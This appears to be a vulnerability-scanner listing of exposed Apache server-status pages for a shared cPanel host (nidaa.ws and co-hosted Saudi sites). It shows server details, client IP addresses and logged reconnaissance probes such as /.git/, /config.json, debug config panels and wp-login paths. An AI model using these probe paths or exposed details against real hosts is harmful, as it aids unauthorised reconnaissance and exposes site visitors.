      ........_______________K______________________________K___......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      <SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-235250/82/2458_
      8.4925422131680.03.82308.96
      37.243.60.248http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/aJLsdNH0RF9Ql1OrcBkQxc
      
      0-235250/45/2116_
      8.08408114011540.031.25364.37
      188.50.180.101http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2022/02/cropped-Artboard-2-1-32x32.png 
      
      0-235250/81/2210_
      8.4260211544730.03.86302.71
      176.224.236.110http/1.1zed.sa:443GET /menu/wp-content/plugins/jet-tricks/assets/js/jet-tricks-fr
      
      0-235250/49/2244_
      8.30309214673500.012.33268.38
      142.247.219.50http/1.1albayan.edu.sa:443GET /e_sch/css/images/pause.png HTTP/1.1
      
      0-235250/36/2310_
      8.263721392318349670.029.08333.42
      188.51.173.224http/1.1sulaimaniya.edu.sa:443GET /download/89/%D8%A7%D9%84%D9%85%D8%B1%D8%AD%D9%84%D8%A9-%D8
      
      0-235250/88/2121_
      7.86463220915160.08.51296.31
      168.138.41.19http/1.1albayan.edu.sa:443GET /cgi-bin/wp-login.php HTTP/1.1
      
      0-235250/69/2246_
      7.8743775020226460.027.71261.90
      52.230.152.128http/1.1zed.sa:80GET /robots.txt HTTP/1.1
      
      0-235250/63/2121_
      8.341426313417530.05.60315.60
      94.99.36.33http/1.1albayan.edu.sa:443GET /web/472.html2 HTTP/1.1
      
      0-235250/51/2640_
      8.312876216616470.029.66466.16
      167.71.81.114http/1.1trynidaa.com:80GET /s/8343e2130323e2130323e2833313/_/;/META-INF/maven/com.atla
      
      0-235250/61/2271_
      8.34108014036470.02.74376.00
      66.249.64.12http/1.1albayan.edu.sa:443GET /robots.txt HTTP/1.1
      
      0-235250/54/1980_
      8.3218080214803160.03.80357.86
      54.36.148.129http/1.1daris.live:443GET /product/part/66/263 HTTP/1.1
      
      0-235250/76/2628_
      8.3029213016689070.02.85228.28
      114.119.141.24http/1.1sulaimaniya.edu.sa:80GET /robots.txt HTTP/1.1
      
      0-235250/54/2385_
      8.33169219924460.024.42434.20
      94.99.36.33http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.ttf HTTP/1.1
      
      0-235250/30/2314_
      7.87441110624410.00.62322.32
      31.166.63.49http/1.1albayan.edu.sa:443GET /e_sch/css/images/arrow-next.png HTTP/1.1
      
      0-235250/70/2434_
      8.5024323180870.04.73279.39
      36.70.227.136http/1.1php.we3dvi.com:443GET /.git/ HTTP/1.1
      
      0-235250/90/2066_
      8.473109490580.07.48420.18
      66.249.64.10http/1.1albayan.edu.sa:80GET /web.html HTTP/1.1
      
      0-235250/58/2122_
      8.464248702490.03.25410.64
      37.243.126.122http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/tOjex3mEFyPsbTAT8gkfRn
      
      0-235250/70/2171_
      8.32198217771990.012.10376.93
      46.251.130.15http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      0-235250/57/2485_
      8.3884413166160.06.95327.11
      142.154.84.28http/1.1alezdhar.com:443GET /images/instagram.png HTTP/1.1
      
      0-235250/56/2305_
      7.85475119044190.02.10237.89
      168.138.41.19http/1.1albayan.edu.sa:443GET /wp-includes/wp-login.php HTTP/1.1
      
      0-235250/46/2242_
      7.67496220778950.02.75230.38
      188.53.73.64http/1.1
      
      0-235250/28/2183_
      8.3125109350740.01.15296.37
      195.175.22.38http/1.1akg.thenewjeddah.com:80GET /wp-login.php HTTP/1.1
      
      0-235250/31/2210_
      8.302895815435020.063.15415.92
      167.71.81.114http/1.1trynidaa.com:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-235251/74/2247K
      8.550111772790.831.63314.48
      162.158.86.95http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-235250/55/2578_
      8.559514380300.05.84420.41
      37.243.60.248http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/LYox4IhB7DIxG5UQ39sf0s
      
      1-235560/69/2119_
      8.50453128267190.08.85390.56
      168.138.41.19http/1.1albayan.edu.sa:443GET /.wp-cli/wp-login.php HTTP/1.1
      
      1-235560/46/2169_
      8.7424427981220.036.63365.25
      37.243.60.248http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/1D92GOCkUUxk9KBgmE7pG7
      
      1-235560/46/2230_
      8.7029313191180.01.48375.88
      37.243.126.122http/1.1jawad.com.sa:443GET /public/front_resources/js/owl.carousel.min.js HTTP/1.1
      
      1-235560/31/2042_
      7.74419416606000.01.95293.48
      82.167.40.231http/1.1
      
      1-235560/74/2237_
      8.50463011261110.034.89296.87
      168.138.41.19http/1.1albayan.edu.sa:80GET /cgi-bin/wp-login.php HTTP/1.1
      
      1-235560/64/1951_
      8.582462010268710.03.43257.64
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      1-235560/50/2028_
      8.76122012194670.09.71274.66
      37.243.60.248http/1.1jawad.com.sa:443POST /api/v.1/front/category/list HTTP/1.1
      
      1-235560/76/2117_
      8.464185914042630.011.02312.50
      82.167.40.231http/1.1
      Found on 2024-05-26 15:59
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df71bfd74b5

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Sunday, 26-May-2024 08:15:51 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 3
      Parent Server MPM Generation: 2
      Server uptime:  3 days 4 hours 11 minutes 1 second
      Server load: 0.58 0.47 0.43
      Total accesses: 443788 - Total Traffic: 62.0 GB - Total Duration: 487110736
      CPU Usage: u180.96 s14.77 cu1919.14 cs420.05 - .924% CPU load
      1.62 requests/sec - 237.1 kB/second - 146.6 kB/request - 1097.62 ms/request
      19 requests currently being processed, 0 workers gracefully restarting, 231 idle workers
      _______________K_________K_________________K________K____K______
      ______________KKK________________________K________________K_____
      ______KW________________________________K____K____K___K_________
      ________.................................................._K____
      _________________________K_____________K____....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-265560/64/2185_
      7.25562621618700.02.90268.46
      159.89.17.243http/1.1garndhabi.org:80GET /assets/plugins/jquery-gmap/.DS_Store HTTP/1.1
      
      0-265560/49/1831_
      7.1320126610859120.03.14319.46
      51.252.157.253http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      0-265560/66/1936_
      7.21125210839420.07.53238.09
      31.167.168.136http/1.1albayan.edu.sa:443GET /js/jquery-1.3.2.js HTTP/1.1
      
      0-265560/48/2006_
      7.405811260040.03.65237.70
      31.167.72.252http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      0-265560/100/2056_
      7.201912717623730.03.21282.95
      103.163.220.170http/1.1garndhabi.org:80GET /style2.php HTTP/1.1
      
      0-265560/61/1861_
      7.26552620430190.04.11273.18
      159.89.17.243http/1.1garndhabi.org:80GET /assets/plugins/jquery-superbox/.DS_Store HTTP/1.1
      
      0-265560/46/2012_
      7.25562719495120.02.49225.28
      159.89.17.243http/1.1garndhabi.org:80GET /assets/plugins/jquery/.DS_Store HTTP/1.1
      
      0-265560/62/1881_
      7.26551412210760.03.26285.19
      159.89.17.243http/1.1garndhabi.org:80GET /assets/plugins/planetary/.DS_Store HTTP/1.1
      
      0-265560/41/2458_
      7.25571215322070.04.53351.64
      159.89.17.243http/1.1garndhabi.org:80GET /assets/plugins/clockface/.DS_Store HTTP/1.1
      
      0-265560/36/2044_
      7.25562311075770.01.89336.47
      159.89.17.243http/1.1garndhabi.org:80GET /assets/plugins/jquery-nestable/.DS_Store HTTP/1.1
      
      0-265560/53/1765_
      7.24582213284690.02.10326.61
      172.71.154.81http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-265560/48/2320_
      7.2496116309000.011.03205.27
      31.167.168.136http/1.1albayan.edu.sa:443GET /e_sch/images/title.jpg HTTP/1.1
      
      0-265560/86/2172_
      7.3931919092480.05.77372.34
      103.163.220.172http/1.1garndhabi.org:80GET /ten.php HTTP/1.1
      
      0-265560/46/2116_
      7.229208804120.02.82242.63
      31.167.168.136http/1.1albayan.edu.sa:80GET /web.html HTTP/1.1
      
      0-265560/58/2046_
      7.24572721509490.03.16232.73
      159.89.17.243http/1.1garndhabi.org:80GET /v2/_catalog HTTP/1.1
      
      0-265561/47/1833K
      7.40008550950.83.28330.28
      172.71.94.48http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-265560/40/1840_
      7.265407980270.028.50363.83
      159.89.17.243http/1.1garndhabi.org:80GET /uploads/.DS_Store HTTP/1.1
      
      0-265560/32/1977_
      7.25571015946630.063.47355.78
      159.89.17.243http/1.1garndhabi.org:80GET /assets/plugins/bootstrap-select2/.DS_Store HTTP/1.1
      
      0-265560/84/2267_
      7.14194312339440.020.30282.74
      51.252.157.253http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/tOjex3mEFyPsbTAT8gkfRn
      
      0-265560/36/1998_
      6.88149216747960.04.03216.07
      84.235.106.41http/1.1
      
      0-265560/76/1997_
      7.3237217911760.04.71192.23
      178.87.213.32http/1.1albayan.edu.sa:443GET /e_sch/images/title.jpg HTTP/1.1
      
      0-265560/55/1959_
      7.40028394100.04.18277.63
      172.70.86.70http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-265560/43/1977_
      7.2557014715640.01.00306.88
      159.89.17.243http/1.1garndhabi.org:80GET /assets/js/.DS_Store HTTP/1.1
      
      0-265560/50/1961_
      7.2111508844040.05.20245.90
      51.211.37.55http/1.1albayan.edu.sa:80GET /web/images/logo_school.png HTTP/1.1
      
      0-265560/66/2248_
      7.2110213212686100.04.43340.80
      51.252.250.64http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff2?v=4
      
      1-265581/86/1865K
      6.9601253550266.64.47313.87
      172.71.183.76http/1.1nidaa.ws:80GET / HTTP/1.1
      
      1-265580/48/1959_
      6.8992012750310.05.21303.23
      31.167.168.136http/1.1albayan.edu.sa:80GET /web/images/logo_school.png HTTP/1.1
      
      1-265580/79/1999_
      6.91572010617760.02.66354.11
      159.89.17.243http/1.1garndhabi.org:80GET /assets/plugins/bootstrap-timepicker/.DS_Store HTTP/1.1
      
      1-265580/55/1835_
      6.91562515990070.02.76265.76
      159.89.17.243http/1.1garndhabi.org:80GET /assets/plugins/jquery-inputmask/.DS_Store HTTP/1.1
      
      1-265580/46/1870_
      6.9255259122180.04.58237.55
      159.89.17.243http/1.1garndhabi.org:80GET /assets/plugins/shape-hover/.DS_Store HTTP/1.1
      
      1-265580/46/1680_
      6.9156139904290.01.60223.52
      159.89.17.243http/1.1garndhabi.org:80GET /assets/plugins/jquery-block-ui/.DS_Store HTTP/1.1
      
      1-265580/47/1820_
      6.87137799971190.012.96230.07
      54.36.149.70http/1.1daris.live:443GET /user?redirect=product/93/50-living-room-ideas HTTP/1.1
      
      1-265580/53/1836_
      6.91555512158370.04.08274.40
      a05c4808ab.scan.leakix.orghttp/1.1garndhabi.org:80GET /server-st
      Found on 2024-05-26 05:15
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7e7a82f5a

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Saturday, 25-May-2024 17:23:59 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 2
      Parent Server MPM Generation: 1
      Server uptime:  2 days 13 hours 19 minutes 10 seconds
      Server load: 0.39 0.33 0.32
      Total accesses: 373454 - Total Traffic: 49.9 GB - Total Duration: 341885970
      CPU Usage: u148.14 s14.87 cu1607.91 cs336.58 - .955% CPU load
      1.69 requests/sec - 237.0 kB/second - 140.1 kB/request - 915.47 ms/request
      20 requests currently being processed, 0 workers gracefully restarting, 155 idle workers
      _____K_____________K___________K____K________________K_W________
      ___K_______K_K_C__________R________________K_K___K______________
      ____K______KK___________________R_____K_____K__.................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-132770/15/1856_
      3.25122017275240.00.24211.76
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=4&q=1007&t=192.99.37.116&c=5 HTTP
      
      0-132770/28/1465_
      3.319317008070.02.84251.85
      5.41.143.75http/1.1albayan.edu.sa:443GET /apple-touch-icon-precomposed.png HTTP/1.1
      
      0-132770/65/1677_
      3.2911007649340.03.43163.79
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      0-132770/27/1578_
      3.3096010258400.01.52188.15
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=1279&t=192.99.37.116&c=5 HTTP
      
      0-132770/29/1623_
      3.5935114226210.01.69241.78
      51.36.239.221http/1.1albayan.edu.sa:443GET /e_sch/css/images/play.png HTTP/1.1
      
      0-132771/28/1504K
      3.642511513186.11.10235.23
      195.191.219.132http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=3&q=699&t=85.10.199.185&c=5 HTTP/
      
      0-132770/25/1733_
      3.3281014582710.01.02203.53
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=1134&t=5.9.70.113&c=5 HTTP/1.
      
      0-132770/31/1585_
      3.309449836100.02.63258.18
      195.191.219.132http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=3&q=686&t=5.9.141.8&c=5 HTTP/1.1
      
      0-132770/28/2055_
      3.638010173250.00.44315.60
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=4&q=1009&t=148.251.69.139&c=5 HTT
      
      0-132770/19/1688_
      3.327409433170.02.04303.03
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=4&q=1008&t=144.76.118.82&c=5 HTTP
      
      0-132770/22/1429_
      3.58500212567210.01.89222.64
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=1160&t=78.46.63.108&c=5 HTTP/
      
      0-132770/36/1929_
      3.27116314628040.04.64174.39
      51.36.232.184http/1.1albayan.edu.sa:443GET /web/images/title.jpg HTTP/1.1
      
      0-132770/23/1748_
      3.5852262115833450.028.50342.24
      77.30.195.78http/1.1sulaimaniya.edu.sa:443GET /download/52/%D9%81%D9%8A%D8%B2%D9%8A%D8%A7%D8%A1/1903/%D8%
      
      0-132770/25/1801_
      3.251262167304120.02.05195.49
      51.39.100.147http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-132770/17/1702_
      3.5942117831220.00.79140.85
      20.26.44.161http/1.1albayan.edu.sa:443GET /imgweb/%D8%A7%D9%84%D8%AC%D8%B2%D8%A1%20%D8%A7%D9%84%D9%85
      
      0-132770/22/1492_
      3.631607086250.01.25275.57
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=1162&t=144.76.236.112&c=5 HTT
      
      0-132770/11/1505_
      3.603107061290.03.27292.84
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=1161&t=78.46.85.236&c=5 HTTP/
      
      0-132770/25/1724_
      3.6323413020860.01.17274.42
      151.254.238.238http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/close_video_bg.png
      
      0-132770/21/1841_
      3.23134010269200.00.81208.48
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=4&q=1007&t=148.251.78.18&c=5 HTTP
      
      0-132771/42/1704K
      3.640110124990.81.19151.33
      172.70.251.40http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-132770/23/1654_
      3.30101011790000.00.35158.75
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=1279&t=144.76.81.229&c=5 HTTP
      
      0-132770/56/1710_
      3.32872184509570.01.23213.13
      5.41.143.75http/1.1albayan.edu.sa:443GET /imgweb/file44/71%20%D8%AA%D8%A7%D8%A8%D8%B9%20%D8%AF%D9%84
      
      0-132770/77/1733_
      3.122848666490.03.47259.04
      188.132.76.145http/1.1
      
      0-132770/47/1588_
      3.2611858148840.02.15218.88
      195.191.219.132http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=3&q=681&t=144.76.119.201&c=5 HTTP
      
      0-132770/19/1939_
      3.583909572840.01.11260.84
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=4&q=1008&t=192.99.37.116&c=5 HTTP
      
      1-1287580/71/1538_
      12.9190022403390.016.78266.82
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=686&t=85.10.199.185&c=5 HTTP/
      
      1-1287580/90/1640_
      12.9733311112660.05.99261.37
      51.36.239.221http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      1-1287580/89/1615_
      13.012327256230.03.28221.40
      151.254.238.238http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/video.png HTTP/1.1
      
      1-1287580/64/1578_
      12.89101010532540.06.50238.91
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=1067&t=5.9.140.242&c=5 HTTP/1
      
      1-1287580/63/1597_
      12.4719155827095910.017.99204.07
      31.166.96.214http/1.1
      
      1-1287580/88/1427_
      12.937008629410.011.64210.43
      195.191.219.132http/1.1albayan.edu.sa:80
      Found on 2024-05-25 14:23
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7db27ab85

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Saturday, 25-May-2024 15:35:17 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 2
      Parent Server MPM Generation: 1
      Server uptime:  2 days 11 hours 30 minutes 27 seconds
      Server load: 0.20 0.35 0.39
      Total accesses: 363111 - Total Traffic: 47.8 GB - Total Duration: 331112917
      CPU Usage: u106.71 s5.81 cu1597.5 cs333.59 - .954% CPU load
      1.69 requests/sec - 233.8 kB/second - 137.9 kB/request - 911.878 ms/request
      17 requests currently being processed, 0 workers gracefully restarting, 108 idle workers
      W______K___R________________K__K_____K_________R__W____________K
      ______K___R________________KRK______............................
      ................................................................
      ........_____K_W_R_______________...............................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-1287300/10/1822W
      1.660017251780.00.98211.00
      172.69.86.35http/1.1nidaa.ws:80GET /server-status HTTP/1.1
      
      0-1287300/3/1430_
      1.139026951020.00.02248.81
      207.178.84.224http/1.1
      
      0-1287300/9/1587_
      1.748837566120.030.10158.76
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1716640429.42910790443420410156
      
      0-1287300/13/1536_
      1.8016110241620.00.18185.10
      138.68.144.227http/1.1abu-helal.com:80GET /_all_dbs HTTP/1.1
      
      0-1287300/6/1575_
      1.591153014179310.00.23239.42
      37.217.32.96http/1.1jawad.com.sa:443POST /api/v.1/front/new/product?page=0 HTTP/1.1
      
      0-1287300/6/1470_
      1.7110643211446690.028.60234.11
      2.90.80.201http/1.1albayan.edu.sa:443GET /imgweb/1445/5/8%20-%20%D8%A7%D9%84%D9%85%D9%87%D8%A7%D8%B1
      
      0-1287300/15/1700_
      1.7561714550170.00.21202.47
      51.253.141.40http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      0-1287301/4/1547K
      1.83119729600.80.36254.94
      172.69.86.191http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-1287300/17/2023_
      1.4710210155020.01.25315.04
      129.45.25.40http/1.1
      
      0-1287300/6/1659_
      1.801619406410.00.04300.08
      138.68.144.227http/1.1abu-helal.com:80GET / HTTP/1.1
      
      0-1287300/8/1402_
      1.7911787212507280.00.69220.67
      129.45.25.40http/1.1jawad.com.sa:443GET /public/front_resources/css/bootstrap.min.css HTTP/1.1
      
      0-1287300/22/1881R
      1.47146214559020.01.59168.53
      31.167.113.28http/1.1
      
      0-1287300/14/1714_
      1.8305815760090.021.58313.66
      188.54.27.152http/1.1albayan.edu.sa:443GET /web.html HTTP/1.1
      
      0-1287300/8/1768_
      1.74821895280630.00.13189.25
      31.167.113.28http/1.1albayan.edu.sa:443GET /imgweb/1445/book-03.jpg HTTP/1.1
      
      0-1287300/21/1679_
      1.786143414947280.00.88139.79
      51.253.145.106http/1.1albayan.edu.sa:443GET /images/slider/08.jpg HTTP/1.1
      
      0-1287300/12/1459_
      1.801307059380.00.10273.26
      138.68.144.227http/1.1abu-helal.com:80GET /config.json HTTP/1.1
      
      0-1287300/9/1488_
      1.801616763190.00.14244.79
      138.68.144.227http/1.1abu-helal.com:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-1287300/4/1682_
      1.3522213006610.00.24272.86
      51.253.145.106http/1.1
      
      0-1287300/4/1815_
      1.61114210244400.00.91207.41
      176.18.3.187http/1.1albayan.edu.sa:443GET /e_sch/js/menu.js HTTP/1.1
      
      0-1287300/58/1650_
      1.72106110097240.00.09150.06
      199.47.82.19http/1.1albayan.edu.sa:443GET /imgweb/file42/%d8%a7%d9%84%d8%af%d9%88%d8%b1%d9%8a%20%d8%a
      
      0-1287300/5/1623_
      1.38544011548400.00.09158.25
      199.47.82.19http/1.1
      
      0-1287300/10/1641_
      1.82704465420.00.17211.72
      216.244.66.227http/1.13dvi.com:443GET /robots.txt HTTP/1.1
      
      0-1287300/12/1648_
      1.6411306656700.00.81255.53
      176.18.3.187http/1.1albayan.edu.sa:80GET /web/images/logo_school.png HTTP/1.1
      
      0-1287300/5/1537_
      1.7297358128030.00.19216.68
      37.217.32.96http/1.1jawad.com.sa:443POST /api/v.1/front/new/product?page=1 HTTP/1.1
      
      0-1287300/18/1908_
      1.6411337698650.00.94259.61
      37.217.32.96http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/1D92GOCkUUxk9KBgmE7pG7
      
      1-1287580/9/1476_
      1.5161122318140.012.06262.10
      51.253.145.106http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.ttf HTTP/1.1
      
      1-1287580/11/1561_
      1.47103210897860.00.26255.64
      176.18.3.187http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      1-1287580/8/1534_
      1.489507190040.00.18218.29
      54.36.148.202http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=5&q=864&t=54.36.148.117&c=5 HTTP/
      
      1-1287582/6/1520K
      1.751110458031.60.96233.37
      172.69.94.45http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      1-1287580/5/1539_
      1.5348316375390.00.04186.12
      31.167.113.28http/1.1albayan.edu.sa:443GET /web/266.html2 HTTP/1.1
      
      1-1287580/11/1350_
      1.4983978326370.00.25199.05
      31.167.113.28http/1.1albayan.edu.sa:443GET /imgweb/1445/book-02.jpg HTTP/1.1
      
      1-1287587/17/1416K
      1.7507674217574.31.91184.69
      188.54.27.152http/1.1albayan.edu.sa:443GET /web/391.html2 HTTP/1.1
      
      1-1287580/46/1519_
      1.7113111430460.027.40173.09
      199.47.82.19http/1.1albayan.edu.sa:443GET /imgweb/file42/%d8%ac%d8%af%d8%a7%d9%88%d9%84%20%d8%a7%d9%8
      
      1-1287580/9/1413_
      1.5060013054630.00.20198.94
      51.253.141.40
      Found on 2024-05-25 12:35
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7a332efe9

      Apache Status
      
